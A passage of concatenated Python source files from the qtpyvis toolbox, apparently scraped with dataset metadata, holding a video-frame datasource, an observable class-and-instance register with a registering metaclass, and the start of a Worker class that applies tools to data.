"alpha_frac": 0.5663299663,
"autogenerated": false,
"ratio": 4.324403028538148,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5390732994838148,
"avg_score": null,
"num_lines": null
} |
"""A :py:class:`Datasource` reading frames from a video.
"""
# standard imports
import logging
# thirdparty imports
import numpy as np
# toolbox imports
from dltb.base.video import Reader
from dltb.base.data import Data
from .datasource import Imagesource, Imagesourcelike, Indexed, Livesource
# logging
LOG = logging.getLogger(__name__)
# FIXME[error]: when looping over the end of the video, the
# loop continues but raises errors:
class Video(Indexed, Imagesource, Livesource):
    # pylint: disable=too-many-ancestors
    """A data source fetching frames from a video.

    Attributes
    ----------
    _backend:
        The VideoBackend used for accessing the video file.
    _filename:
        The filename from which the video is read.
    _frame:
        The currently fetched frame.
        If the frame changes, Observers of this :py:class:`Video`
        will receive a `data_changed` notification.
    """

    def __init__(self, filename: str, **kwargs):
        """Create a new Video datasource for the given file.
        """
        super().__init__(**kwargs)
        self._filename = filename
        self._backend = None
        self._frame = None
        self._description = "Frames from the video \"{}\"".format(filename)

    def __str__(self):
        return 'Movie'

    #
    # Preparable
    #

    def _prepared(self) -> bool:
        """Report if this Datasource is prepared for use.
        A Datasource has to be prepared before it can be used.
        """
        return super()._prepared() and (self._backend is not None)

    def _prepare(self) -> None:
        """Prepare this Datasource for use.

        Opens the video file via a :py:class:`Reader` backend and
        derives the live-loop interval from the video's frame rate.
        """
        super()._prepare()
        self._backend = Reader(filename=self._filename)
        self._loop_interval = 1. / self._backend.frames_per_second

    def _unprepare(self) -> None:
        """Unprepare this Datasource. This will free resources but
        the video can no longer be used. Call :py:meth:`prepare`
        to prepare the video for another use.
        """
        if self._backend:
            # Drop the backend reference so the reader can release the
            # underlying file/stream.
            del self._backend
            self._backend = None
        self._frame = None
        super()._unprepare()

    #
    # Data
    #

    def _get_meta(self, data: Data, **kwargs) -> None:
        # pylint: disable=arguments-differ
        """Get metadata for some data.
        """
        data.add_attribute('frame', batch=True)  # usually the same as index
        data.add_attribute('time', batch=True)
        super()._get_meta(data, **kwargs)

    def _get_frame_at(self, data: Data, time: float):
        """Fetch a video frame at a given timepoint from this
        :py:class:`Video`.

        Arguments
        ---------
        time: float
            The temporal position (point in time) of the frame
            to fetch in seconds (fractions may be given).
        """
        data.array = self._backend.get_frame_at(time)
        data.index = self._backend.frame

    def _get_data(self, data: Data, frame: int = None, time: float = None,
                  index: int = None, **kwargs) -> None:
        # pylint: disable=arguments-differ
        # Translate a 'frame' or 'time' request into an index; only one
        # of the three selectors is honored (frame wins over time).
        if frame is not None and not data:
            data.datasource_argument = 'frame'
            data.datasource_value = frame
            index = frame
        elif time is not None and not data:
            data.datasource_argument = 'time'
            data.datasource_value = time
            index = self._backend.frame_at(time)
        super()._get_data(data, index=index, **kwargs)

    def _get_default(self, data: Data, **kwargs) -> None:
        """The default is to obtain the next frame from the video.
        """
        self._get_index(data, index=None, **kwargs)  # get next frame

    def _get_snapshot(self, data, snapshot: bool = True, **kwargs) -> None:
        """Reading a snapshot from the video means reading the next frame.

        Arguments
        ---------
        snapshot: bool
            If True, try to make sure that we get a current snapshot.
            On some systems, the video driver buffers some frame, so that
            just reading the frame may result in outdated data and
            one should first empty the buffer before reading the data.
        """
        LOG.debug("Video._get_data(snapshot=%r)", snapshot)
        self._get_index(data, index=None, **kwargs)  # get next frame

    def _get_index(self, data: Data, index: int, **kwargs) -> None:
        """Implementation of the :py:class:`Indexed` datasource interface.
        The index will be interpreted as frame number.

        Arguments
        ---------
        index: int
            The frame number of the frame to fetch from the video.
            If no frame is given, the next frame of the video will
            be fetched (advancing the frame number by 1).
        """
        data.array = self._backend[index]
        data.frame = self._backend.frame
        # NOTE(review): `index or data.frame` falls back to the backend
        # frame when index is 0, not only when it is None -- confirm
        # that frame 0 is handled as intended.
        data.index = index or data.frame
        data.time = self._backend.time

    #
    # Public Video API
    #

    @property
    def frame(self) -> int:
        """The current frame of this video.
        The next frame read will be frame + 1.
        """
        return self._backend.frame

    @property
    def time(self) -> float:
        """The current frame time of this video.
        """
        return self._backend.time

    @property
    def frames_per_second(self) -> float:
        """Frames per second for this video.
        """
        return self._backend.frames_per_second

    #
    # Implementation of the 'Indexed' API
    #

    def __len__(self) -> int:
        """The length of a video is the number of frames it is composed of.
        """
        if not self.prepared:
            raise RuntimeError("Applying len() to unprepare Video object.")
        return len(self._backend)
class Thumbcinema(Reader):
    """A video :py:class:`Reader` that uses an `Imagesource` to produce
    a sequence of frames.

    >>> reader = Thumbcinema(Datasource['imagenet'])

    # FIXME[todo]
    >>> reader = Thumbcinema('imagenet')
    """

    def __init__(self, source: Imagesourcelike) -> None:
        # NOTE(review): the Reader base initializer is deliberately not
        # invoked here, mirroring the original code -- confirm whether
        # Reader.__init__ requires arguments before adding a super() call.
        self._source = Imagesource.as_imagesource(source)

    def __enter__(self) -> Reader:
        """Prepare the underlying image source and start iterating over it.
        """
        self._source.prepare()
        self._iterator = iter(self._source)
        return super().__enter__()

    def __next__(self) -> np.ndarray:
        """Implementation of the :py:class:`Iterator` interface.

        Returns the array of the next image from the underlying source.
        """
        # Fix: removed leftover debug instrumentation (a frame counter,
        # range-gated print statements and a per-call `import sys`) that
        # polluted stdout/stderr during normal iteration.
        return next(self._iterator).array
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/datasource/video.py",
"copies": "1",
"size": "6766",
"license": "mit",
"hash": 3320269411752227300,
"line_mean": 30.3240740741,
"line_max": 82,
"alpha_frac": 0.5885308897,
"autogenerated": false,
"ratio": 4.1281269066503965,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.000055778670236501566,
"num_lines": 216
} |
"""A :py:class:`Register` is basically an :py:class:`Observable` container,
that notifies its :py:class:`Observer`s when entries are registered or
unregistered.
"""
# Generic imports
from abc import ABCMeta, abstractmethod
from typing import Iterator, Tuple, Union
import importlib
import logging
# Toolbox imports
from .observer import Observable
from .busy import BusyObservable, busy
from .prepare import Preparable
from .fail import Failable
from ..util.debug import debug_object
from ..thirdparty import check_module_requirements
# Logging
LOG = logging.getLogger(__name__)
class Registrable(metaclass=ABCMeta):
    # pylint: disable=too-few-public-methods
    """Base class for objects that can be stored in a
    :py:class:`Register`.  Being registrable essentially means
    exposing a unique identifier via the read-only :py:attr:`key`
    property.

    Attributes
    ----------
    key: str
        A (supposed to be unique) key identifying the instance.
    """

    @property
    @abstractmethod
    def key(self):
        """The "public" key used to identify this entry in a register.
        The key is fixed upon initialization and should not change
        afterwards.
        """
        # to be implemented by subclasses
class RegisterEntry(Registrable, debug_object):
    # pylint: disable=too-few-public-methods
    """Default implementation of a :py:class:`Registrable` object.
    The :py:attr:`key` property is realized by keeping the key in a
    private attribute; if no key is supplied at construction time,
    one is generated from the class name and a per-class counter.

    Attributes
    ----------
    _key: str
        A (supposed to be unique) key for the new instance.

    Class Attributes
    ----------------
    _key_counter: int
        A counter used for generating unique keys.
    """

    _key_counter = 0

    def __init__(self, *args, key: str = None, **kwargs) -> None:
        """Initialize this :py:class:`RegisterEntry`, making sure
        the object ends up with a key.
        """
        super().__init__(*args, **kwargs)
        if key:
            self._key = key
        else:
            self._key = self._generate_key()
        LOG.debug("RegisterEntry: init instance of class %s with key '%s'",
                  type(self).__name__, self.key)

    def _generate_key(self) -> str:
        """Create a fresh key from the class name and a running counter."""
        cls = type(self)
        cls._key_counter += 1
        return cls.__name__ + str(cls._key_counter)

    @property
    def key(self):
        """The "public" key used to identify this entry in a register.
        The key is fixed upon initialization and should not change
        afterwards.
        """
        return self._key
class Register(Observable, method='register_changed',
               changes={'entry_added', 'entry_changed', 'entry_removed'}):
    """An observable container of :py:class:`Registrable` entries,
    notifying observers when entries are added, changed, or removed.

    **Changes**

    'entry_added':
        A new entry was added to this :py:class:`Register`.
    'entry_changed'
        A register entry has changed.
    'entry_removed':
        A key was removed from this :py:class:`Register`.
    """

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)
        # Mapping from key (str) to the registered entry.
        self._entries = {}

    def add(self, entry: Registrable) -> None:
        """Add a new entry to this :py:class:`Register` and notify
        observers with 'entry_added'.
        """
        key = entry.key
        self._entries[key] = entry
        self.register_change(key, 'entry_added')

    def remove(self, entry: Registrable) -> None:
        """Remove an entry from this :py:class:`Register` and notify
        observers with 'entry_removed'.  Raises KeyError if the
        entry is not registered.
        """
        key = entry.key
        del self._entries[key]
        self.register_change(key, 'entry_removed')

    #
    # The Container[Registrable] protocol
    #

    def __contains__(self, entry: Union[str, Registrable]) -> bool:
        """Check if the given entry is registered.

        Argument
        --------
        entry: Union[str, Registrable]
            Either the entry or its key.
        """
        key = entry.key if isinstance(entry, Registrable) else entry
        return key in self._entries

    #
    # The Sized protocol
    #

    def __len__(self) -> int:
        """The number of entries in this register."""
        return len(self._entries)

    #
    # The Iterable interface
    #

    def __iter__(self) -> Iterator[Registrable]:
        """Iterate the entries registered in this :py:class:`Register`."""
        # Iterate the values directly instead of mapping over items().
        return iter(self._entries.values())

    #
    # item access
    #

    def __getitem__(self, key: str) -> Registrable:
        """Look up the entry for the given key in this
        :py:class:`Register`.  Raises KeyError for unknown keys.
        """
        return self._entries[key]

    def keys(self, **kwargs) -> Iterator[str]:
        """Iterate the keys of the entries registered in this
        :py:class:`Register`.  Keyword arguments are passed through to
        :py:meth:`entries` (subclasses may support filters there).
        """
        return map(lambda entry: entry.key, self.entries(**kwargs))

    def entries(self) -> Iterator[Registrable]:
        # Fixed return annotation: this iterates entries, not keys.
        """Iterate the entries of this :py:class:`Register`."""
        return iter(self)

    def __iadd__(self, entry: Registrable) -> 'Register':
        """Add a new entry or replace an existing entry in this
        :py:class:`Register` (``register += entry``).
        """
        key = entry.key
        self._entries[key] = entry
        self.register_change(key, 'entry_added')
        # Bug fix: __iadd__ must return self.  Returning None made
        # `register += entry` rebind the name `register` to None.
        return self

    def __delitem__(self, entry: Union[str, Registrable]) -> None:
        """Remove an entry (given by object or key) from this
        :py:class:`Register`.
        """
        key = entry if isinstance(entry, str) else entry.key
        del self._entries[key]
        self.register_change(key, 'entry_removed')

    def register_change(self, key: str, *args, **kwargs) -> None:
        """Notify observers on a register change.  Arguments are
        forwarded to the :py:class:`Change` constructor; empty
        changes are silently dropped.
        """
        changes = self.Change(*args, **kwargs)
        LOG.debug("register change on %s: %s with key='%s'",
                  self, changes, key)
        if not changes:
            return  # nothing to report
        self.notify_observers(changes, key=key)
#
# The ClassRegister
#
class StatefulRegisterEntry(BusyObservable, Registrable, Failable,
                            method='entry_changed'):
    """Base class for register entries whose state can be observed
    (busy state, failures, and initialization state).
    """

    @property
    @abstractmethod
    def initialized(self) -> bool:
        """Flag indicating whether this entry has been initialized."""
class StatefulRegister(Register, StatefulRegisterEntry.Observer):
    """A :py:class:`Register` whose entries are stateful.  The
    register observes each entry's 'state_changed' notifications and
    forwards them to its own observers as 'entry_changed'.
    """

    def add(self, entry: StatefulRegisterEntry) -> None:
        # pylint: ignore
        """Add a new entry to this :py:class:`StatefulRegister` and
        start observing its state.
        """
        super().add(entry)
        # 'busy_changed', state_changed
        self.observe(entry,
                     interests=StatefulRegisterEntry.Change('state_changed'))

    def remove(self, entry: StatefulRegisterEntry) -> None:
        """Stop observing an entry and remove it from this
        :py:class:`StatefulRegister`.
        """
        self.unobserve(entry)
        super().remove(entry)

    def entry_changed(self, entry: StatefulRegisterEntry,
                      _change: StatefulRegisterEntry.Change) -> None:
        """React to a change of an observed
        :py:class:`StatefulRegisterEntry` by propagating it to the
        observers of this register.
        """
        self.register_change(entry.key, 'entry_changed')

    def entries(self, initialized: bool = None) -> Iterator[Registrable]:
        # pylint: disable=arguments-differ
        """Iterate the entries of this register, optionally filtered
        by their initialization state (`True`, `False`, or `None`
        for no filtering).
        """
        all_entries = super().entries()
        if initialized is None:
            return all_entries
        return filter(lambda entry: initialized is entry.initialized,
                      all_entries)
#
# The ClassRegister
#
class ClassRegisterEntry(StatefulRegisterEntry):
    """A :py:class:`ClassRegisterEntry` represents information that
    can be used to import a class. This includes module and class name.
    """

    def __init__(self, module_name: str = None, class_name: str = None,
                 cls: type = None, **kwargs) -> None:
        """
        Arguments
        ---------
        module_name: str
            Fully qualified module name.
        class_name: str
            Class name, either short or fully qualified
            (including module name). In the latter case, no module
            name has to be provided.
        cls: type
            The instantiated class object. If given, `module_name`
            and `class_name` will be determined automatically and
            do not have to be provided.

        Raises
        ------
        ValueError
            If neither a class nor module and class name are given.
        """
        super().__init__(**kwargs)

        if not (module_name and class_name) and cls is None:
            raise ValueError("Provide either module and class name or class "
                             "for ClassRegisterEntry")

        if cls is not None:
            # Derive both names from the class object itself.
            module_name, class_name = cls.__module__, cls.__name__
        elif module_name is None and '.' in class_name:
            # Split a fully qualified class name into module and class.
            module_name, class_name = class_name.rsplit('.', maxsplit=1)

        self.cls = cls
        self.module_name = module_name
        self.class_name = class_name

    def __str__(self) -> str:
        """String representation of this :py:class:`ClassRegisterEntry`."""
        info = f"class {self.module_name}.{self.class_name}: "
        info += f"initialized={self.initialized}"
        if not self.initialized:
            # Bug fix: the old format string had a stray space, producing
            # "( initializable)" / "(not  initializable)".
            info += f" ({'' if self.initializable else 'not '}initializable)"
        return info

    @property
    def key(self):
        """The unique key identifying a class: the canonical (full)
        class name, including the module name.
        """
        return self.module_name + '.' + self.class_name

    @property
    def initializable(self) -> bool:
        """Check if this :py:class:`ClassRegisterEntry` can be initialized.
        Some classes may not be initializable due to unfulfilled requirements
        (like Python modules that have not been installed).
        """
        return self.initialized or check_module_requirements(self.module_name)

    @property
    def initialized(self) -> bool:
        """Check if the class represented by this entry has already
        been imported.
        """
        return self.cls is not None

    @busy("Initializing class")
    def initialize(self) -> None:
        """Initialize this class entry.  This essentially means to
        import the module holding the class definition and store the
        class object in :py:attr:`cls`.  Failures are recorded via
        the :py:class:`Failable` machinery.
        """
        if self.cls is not None:
            return  # Nothing to do

        message = (f"Initialization of class '{self.class_name}' "
                   f"from module {self.module_name}")
        with self.failure_manager(logger=LOG, message=message):
            module = importlib.import_module(self.module_name)
            self.cls = getattr(module, self.class_name)
class ClassRegister(StatefulRegister):
    """A register for :py:class:`ClassRegisterEntry`s.  All registered
    classes are subclasses of a common base class that has to be
    provided upon construction.
    """

    def __init__(self, base_class: type = None, **kwargs) -> None:
        if base_class is None:
            raise ValueError("No base class was provided "
                             "for the new ClassRegister.")
        super().__init__(**kwargs)
        self._base_class = base_class

    @property
    def base_class(self) -> type:
        """The base class of this :py:class:`ClassRegister`.
        All classes registered have to be subclasses of this base class.
        """
        return self._base_class

    def __getitem__(self, key: Union[str, type]) -> Registrable:
        """Look up the entry for the given key in this
        :py:class:`Register`.  A class object may be given instead of
        a key; its canonical name is used for the lookup.
        """
        if isinstance(key, type):
            key = f"{key.__module__}.{key.__name__}"
        return super().__getitem__(key)

    def initialized(self, full_name: str) -> bool:
        """Check if a given class is registered and initialized."""
        return full_name in self and self[full_name].initialized

    def new_class(self, cls: type) -> None:
        """Add a new class to this :py:class:`ClassRegister`.
        If there is already an entry for this class, it is updated;
        otherwise a new :py:class:`ClassRegisterEntry` is created.
        """
        key = cls.__module__ + '.' + cls.__name__
        if key not in self:
            self.add(ClassRegisterEntry(cls=cls))
        else:
            self[key].cls = cls
            self.register_change(key, 'entry_changed')
class InstanceRegister(StatefulRegister):
    """A register for :py:class:`InstanceRegisterEntry`s.  All
    registered instances are instances of a common base class that
    has to be provided upon construction.
    """

    def __init__(self, base_class: type = None, **kwargs) -> None:
        if base_class is None:
            raise ValueError("No base class was provided "
                             "for the new InstanceRegister.")
        self._base_class = base_class
        super().__init__(**kwargs)

    @property
    def base_class(self) -> type:
        """The base class of this register. All instances registered
        have to be instances of this class (or one of its subclasses).
        """
        return self._base_class
class InstanceRegisterEntry(StatefulRegisterEntry, RegisterEntry):
    """An :py:class:`InstanceRegisterEntry` represents information that
    can be used to create an object. This includes module and
    class name as well as initialization parameters.
    """

    def __init__(self, key: str = None, obj: object = None,
                 cls: type = None, class_entry: ClassRegisterEntry = None,
                 args=(), kwargs=None, **_kwargs) -> None:
        # pylint: disable=too-many-arguments
        # too-many-arguments:
        # It is fine to give all these arguments here, as they
        # are used to initialize one record of (initialization)
        # information.
        """
        Arguments
        ---------
        key: str
            A unique key for this entry.  May be omitted if `obj` is
            given and is :py:class:`Registrable` (its key is used).
        obj: object
            An already instantiated object (optional).
        cls: type
            The class of the object.  Derived from `obj` if omitted.
        class_entry: ClassRegisterEntry
            The entry describing the class.  Looked up in the class
            register if omitted but `cls` (or `obj`) is available.
        args, kwargs:
            Positional and keyword arguments used to instantiate the
            object on :py:meth:`initialize`.
        """
        if key is None and obj is not None and isinstance(obj, Registrable):
            key = obj.key
        super().__init__(key=key, **_kwargs)
        if key is None:
            raise ValueError("No key provided for new InstanceRegisterEntry.")

        if obj is not None:
            if cls is None:
                cls = type(obj)
            elif cls is not type(obj):
                raise TypeError(f"Type mismatch between class {cls} "
                                f"and object of type {type(obj)}.")
        if cls is not None:
            if class_entry is None:
                class_entry = cls.class_register[cls]
            elif class_entry is not cls.class_register[cls]:
                raise TypeError("Type mismatch between class entry of "
                                f"type {class_entry.cls} and class {cls}.")
        if class_entry is None:
            raise ValueError("No class entry provided for "
                             "InstancRegisterEntry.")
        self._class_entry = class_entry
        self.obj = obj
        self.args, self.kwargs = args, (kwargs or {})

    def __str__(self) -> str:
        """String representation of this :py:class:`InstanceRegisterEntry`.
        """
        return f"{self.key}: {self._class_entry}"

    @property
    def key(self) -> str:
        """The unique key identifying this instance entry."""
        return self._key

    @property
    def cls(self) -> type:
        """The class of the instance described by this entry
        (`None` if the class has not been imported yet).
        """
        return self._class_entry.cls

    @property
    def initializable(self) -> bool:
        """Check if this :py:class:`InstanceRegisterEntry` can be initialized.
        Some keys may not be initializable due to unfulfilled requirements
        (like Python modules that have not been installed).
        """
        return self.initialized or self._class_entry.initializable

    @property
    def initialized(self) -> bool:
        """A flag indicating if this :py:class:`InstanceRegisterEntry`
        is initialized (`True`) or not (`False`).
        """
        # `obj is True` marks an entry that is not (yet) a real object.
        return self.obj is not None and self.obj is not True

    @busy("Initializing instance")
    def initialize(self, prepare: bool = False) -> None:
        # pylint: disable=arguments-differ
        """Initialize this :py:class:`InstanceRegisterEntry`.
        When finished, the register observers will be informed on
        `entry_changed`, and the :py:attr:`initialized` property
        will be set to `True`.
        """
        if self.obj is not None:
            return  # Nothing to do

        # Initialize the class object (synchronously).
        self._class_entry.initialize(busy_async=False)

        message = (f"Initialization of InstanceRegisterEntry '{self.key}' "
                   f"from class {self._class_entry}")
        with self.failure_manager(logger=LOG, message=message):
            self.obj = self._class_entry.cls(*self.args, key=self.key,
                                             **self.kwargs)
            self.change('state_changed')
            if prepare and isinstance(self.obj, Preparable):
                self.obj.prepare()

    @busy("Uninitializing instance")
    def uninitialize(self) -> None:
        """Uninitialize this :py:class:`InstanceRegisterEntry`.
        When finished, the register observers will be informed on
        `entry_changed`, and the :py:attr:`initialized` property
        will be set to `False`.
        """
        obj = self.obj
        if obj is None:
            return  # nothing to do
        self.obj = None
        self.clean_failure()
        self.change('state_changed')
        del obj

    @property
    def register(self) -> InstanceRegister:
        """The instance register of the :py:class:`RegisterClass` to
        which the object of this :py:class:`InstanceRegisterEntry`
        belongs.
        """
        # Bug fix: the attribute is named `_class_entry`;
        # `self._entry_class` was never set and raised AttributeError.
        return (None if self._class_entry.cls is None else
                self._class_entry.cls.instance_register)
class RegisterClass(ABCMeta):
    # pylint: disable=no-value-for-parameter
    # no-value-for-parameter:
    # we disable this warning as there is actually a bug in pylint,
    # not recognizing `cls` as a valid first parameter instead
    # of `self` in metaclasses, and hence taking cls.method as
    # an unbound call, messing up the whole argument structure.
    """A metaclass for classes that allow to register subclasses and
    instances.

    Class attributes
    ----------------
    A class assigned to this meta class will have the following
    attributes (these are considered private properties of the class,
    subject to change, that should not be used outside the class):

    instance_register: InstanceRegister
        A InstanceRegister containing all registered keys for the class.
        The register contains :py:class:`InstanceRegisterEntry`s
        describing all registered instances, including all information
        required for instantiation. If an instance has been instantiated,
        `entry.obj` will be that instance.

    class_register: ClassRegister
        A ClassRegister containing all registered subclasses for
        the classes. The register contains :py:class:`ClassRegisterEntry`s
        describing all registered classes, including information
        for import and initialization. If a class has been created,
        `entry.cls` will be that class.

    Subclasses are automatically added to the `class_register` upon
    initialization, that is usually when the module defining the class
    is imported. Instances are also automatically added upon
    initialization. Instances are registered by a unique key (of type
    `str`).

    ** Preregistering classes and instances **

    It is also possible to preregister subclasses and instances.
    Subclasses can be preregistered by calling
    :py:meth:`register_class`. The idea of preregistering classes is
    to specify requirements that have to be fulfilled in order to
    initialize (import) the class. This allows to filter out those
    subclasses with unmet requirements. The actual initialization
    (import) of a class can be performed in a background thread by
    calling `py:meth:`ClassRegisterEntry.initialize`.

    Preregistering instances is done by the
    :py:meth:`register_instance` method, providing the class name and
    initialization parameters. Preregistering instances has multiple
    purposes. It allows to provide initialization arguments and
    thereby store commonly used instances for fast access. As
    registration is fast (no additional imports or data loading takes
    place during registration), it can be done in the initialization
    phase of the toolbox without significant performance effects (only
    the abstract register base classes have to be imported). The
    actual instantiation can be done in a background thread by calling
    `py:meth:`InstanceRegisterEntry.initialize`.

    A registered instance can be accessed by its key using the expression
    `Class[key]`. If not instantiated yet, the instance will be
    created (synchronously).
    """

    class RegisterClassEntry(RegisterEntry):
        # pylint: disable=too-few-public-methods
        """A registrable object that generates keys from a register.
        """

        def _generate_key(self) -> str:
            # pylint: disable=no-member
            # Key = class name plus number of already registered
            # instances, e.g. "Datasource-3".
            return (self.__class__.__name__ + "-" +
                    str(len(self.instance_register)))

    def __new__(mcs, clsname: str, superclasses: Tuple[type],
                attributedict: dict, **class_parameters) -> None:
        # pylint: disable=bad-mcs-classmethod-argument
        """A new class of the meta class scheme is defined.
        If this is a new base class, we add new class and instance
        registers to that class.

        Parameters
        ----------
        clsname: str
            The name of the newly defined class.
        superclasses: str
            A list of superclasses of the new class.
        attributedict: dict
            The attributes (methods and class attributes) of the
            newly defined class.
        class_parameters:
            Additional class parameters specified in the class
            definition.
        """
        is_base_class = not any(issubclass(supercls, mcs.RegisterClassEntry)
                                for supercls in superclasses)
        if is_base_class:
            superclasses += (mcs.RegisterClassEntry, )
        # class_parameters are to be processed by __init_subclass__()
        # of some superclass of the newly created class ...
        cls = super().__new__(mcs, clsname, superclasses, attributedict,
                              **class_parameters)
        if is_base_class:
            LOG.info("RegisterClass: new base class %s.%s",
                     cls.__module__, cls.__name__)
            cls.base_class = cls
            cls.instance_register = InstanceRegister(cls)
            cls.class_register = ClassRegister(cls)
        return cls

    def __init__(cls, clsname: str, _superclasses: Tuple[type],
                 _attributedict: dict, **_class_parameters) -> None:
        """Initialize a class declared with this :py:class:`RegisterClass`.
        This initialization will add the newly created class to the
        class register.
        """
        # super().__init__(clsname, superclasses, **class_parameters)
        super().__init__(clsname)
        # add the newly initialized class to the class register
        cls.class_register.new_class(cls)

    def __call__(cls, *args, **kwargs) -> None:
        """A hook to adapt the initialization process for classes
        assigned to a :py:class:`RegisterClass`.
        This hook will automatically register all instances of that
        class in the register. If no register key is provided,
        a new one will be created from the class name.
        """
        # Bug fix: the old message was a plain string containing the
        # literal text "{cls.__name}" (missing f-prefix and misspelled
        # dunder); use lazy %-style logging arguments instead.
        LOG.debug("RegisterClass: %s.__call__(%s, %s)",
                  cls.__name__, args, kwargs)
        new_entry = super().__call__(*args, **kwargs)
        if 'key' in kwargs and new_entry.key != kwargs['key']:
            LOG.warning("Key mismatch for new register entry: "
                        "should be '%s' but is '%s'",
                        kwargs['key'], new_entry.key)
        # If the initialization has been invoked directly (not via
        # Register.instance_register.initialize), we will register the
        # new instance now.
        if new_entry not in cls.instance_register:
            entry = InstanceRegisterEntry(obj=new_entry,
                                          args=args, kwargs=kwargs)
            cls.instance_register.add(entry)
            LOG.info("RegisterClass: new instance of class %s with key '%s'",
                     type(new_entry).__name__, new_entry.key)
        return new_entry

    #
    # class related methods
    #

    def register_class(cls, name: str, module: str = None) -> None:
        """Register a (sub)class of the :py:class:`RegisterClass`'s
        base class. These are the classes that upon initialization
        will be registered at this :py:class:`RegisterClass`.

        Subclasses of the base class will be automatically registered
        once the module defining the class is imported. However, it
        is possible to register classes in advance, allowing a user
        interface to offer the initialization (import) of that class.
        A class (registered or not) can be initialized by calling
        :py:meth:`ClassRegisterEntry.initialize`.

        Attributes
        ----------
        name: str
            The class name. Either the fully qualified name,
            including the module name, or just the class name.
            In the second case, the module name has to be provided
            by the argument.
        module: str
            The module name. Only required if not provided as part
            of the class name.
        """
        full_name = name if module is None else ".".join((module, name))
        if full_name not in cls.class_register:
            if module is None:
                module, name = name.rsplit('.', maxsplit=1)
            entry = ClassRegisterEntry(module_name=module, class_name=name)
            cls.class_register.add(entry)

    #
    # instance related methods
    #

    def register_instance(cls, key: str, module_name: str, class_name: str,
                          *args, **kwargs) -> None:
        """Register a key with this class. Registering a key will
        allow to initialize an instance of a class (or subclass)
        of this register.

        Arguments
        ---------
        key: str
            The unique key to be registered with this class.
        module_name: str
            The module in which the class is defined.
        class_name: str
            The name of the class.
        *args, **kwargs:
            Arguments to be passed to the constructor when initializing
            the key.

        Raises
        ------
        ValueError
            If the key has already been registered.
        """
        if key in cls.instance_register:
            # Bug fix: message said "Duplcate ... of {name}with key"
            # (typo and missing space).
            raise ValueError(f"Duplicate registration of {cls.__name__} "
                             f"with key '{key}'.")
        full_name = module_name + '.' + class_name
        if full_name not in cls.class_register:
            cls.register_class(full_name)
        class_entry = cls.class_register[full_name]
        entry = InstanceRegisterEntry(key=key, class_entry=class_entry,
                                      args=args, kwargs=kwargs)
        cls.instance_register.add(entry)

    def __len__(cls):
        """The number of registered instances."""
        return len(cls.instance_register)

    def __contains__(cls, key) -> bool:
        """Check if a given key was registered with this class.
        """
        return key in cls.instance_register

    def __getitem__(cls, key: str) -> object:
        """Access the instantiated entry for the given key.
        If the entry was not instantiated yet, it will be
        instantiated now (synchronously).
        """
        if key not in cls:
            raise KeyError(f"No key '{key}' registered for class "
                           f"{cls.instance_register.base_class}"
                           f"[{cls.__name__}]. Valid keys are: "
                           f"{list(cls.instance_register.keys())}")
        entry = cls.instance_register[key]
        if not entry.initialized:
            entry.initialize(busy_async=False)
        return entry.obj

    def keys(cls) -> Iterator[str]:
        """Iterate keys of all registered instances.
        """
        for key in cls.instance_register.keys():
            yield key

    #
    # Debugging
    #

    def debug_register(cls):
        """Output debug information for this :py:class:`RegisterClass`.
        """
        print(f"debug: register {cls.__name__} ")
        print(f"debug: {len(cls.class_register)} registered subclasses:")
        for i, entry in enumerate(cls.class_register):
            print(f"debug: ({i+1}) {entry.key}: "
                  f"initialized={entry.initialized}")
        print(f"debug: {len(cls.instance_register)} registered instances:")
        for i, entry in enumerate(cls.instance_register):
            print(f"debug: ({i+1}) {entry.key}: "
                  f"initialized={entry.initialized}")
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/base/register.py",
"copies": "1",
"size": "28888",
"license": "mit",
"hash": -4288238697875908600,
"line_mean": 35.0649188514,
"line_max": 79,
"alpha_frac": 0.6031570202,
"autogenerated": false,
"ratio": 4.41442542787286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 801
} |
"""A :py:class:`Worker` is intended for (asynchronously) using
a :py:class.`Tool`.
"""
# standard imports
import logging
# toolbox imports
from ..base.busy import BusyObservable, busy
from ..base.data import Data
from .tool import Tool
# logging
LOG = logging.getLogger(__name__)
class Worker(BusyObservable, Tool.Observer, method='worker_changed',
             changes={'tool_changed', 'data_changed',
                      'work_step', 'work_finished'}):
    """A worker can be used to work on data using a :py:class:`Tool`.
    The worker will hold a data object to which the tool is
    applied. The results are stored as new attributes of that data
    object.
    Working can be done asynchronously. The worker is observable
    and will notify observers on the progress. All workers post
    the following notifications:
    data_changed:
        The data for working was changed. The underlying tool
        has started working on the data, but it may not have finished
        yet. However, the :py:attr:`data` property will already
        provide the new :py:class:`Data` object.
    tool_changed:
        The :py:class:`Tool` to be used for working was changed.
    work_step:
        A work step was done. This will only happen, if the tool
        is an :py:class`IterativeTool` and that `stepwise=True`
        argument has been given. More fine grained tracking
        of the work process can be obtained by observing the
        :py:class:`Data` object itself.
    work_finished:
        The work was finished. The data object will now contain
        the results.
    """

    def __init__(self, tool: Tool = None, **kwargs) -> None:
        """Initialize the worker.  The tool is optional and can be
        set (or replaced) later via the :py:attr:`tool` property.
        """
        super().__init__(**kwargs)
        self._data = None       # data currently (or last) worked on
        self._next_data = None  # queued data; doubles as the "working" flag
        self._tool = tool
        LOG.info("New Worker created: %r (tool=%s)", self, tool)

    @property
    def data(self):
        """The :py:class:`Data` structure used by the worker.
        This data will contain results in specific attributes,
        depending on the tool used and its configuration.
        The data also includes the `duration` (in seconds).
        """
        return self._data

    @property
    def tool(self) -> Tool:
        """The :py:class:`Tool` applied by this :py:class:`Worker`."""
        return self._tool

    @tool.setter
    def tool(self, tool: Tool) -> None:
        """Change the :py:class:`Tool` to be applied by this
        :py:class:`Worker`.  Observation is moved from the old tool
        to the new one, and any current data is reworked.
        """
        LOG.info("Tool changed from %s to %s for worker %r",
                 self._tool, tool, self)
        if tool is not self._tool:
            if self._tool is not None:
                # stop listening to the old tool
                self.unobserve(self._tool)
            self._tool = tool
            if tool is not None:
                self.observe(tool, Tool.Change('tool_changed'))
            self.change('tool_changed')
            if self._data is not None:
                self.work(self._data)  # rework the current data with new tool

    @property
    def ready(self) -> bool:
        """Check if this worker is ready for use.
        """
        return self._ready()

    def _ready(self) -> bool:
        # FIXME[todo/states]: self.tool.ready
        # Ready means: either already working (the running loop will
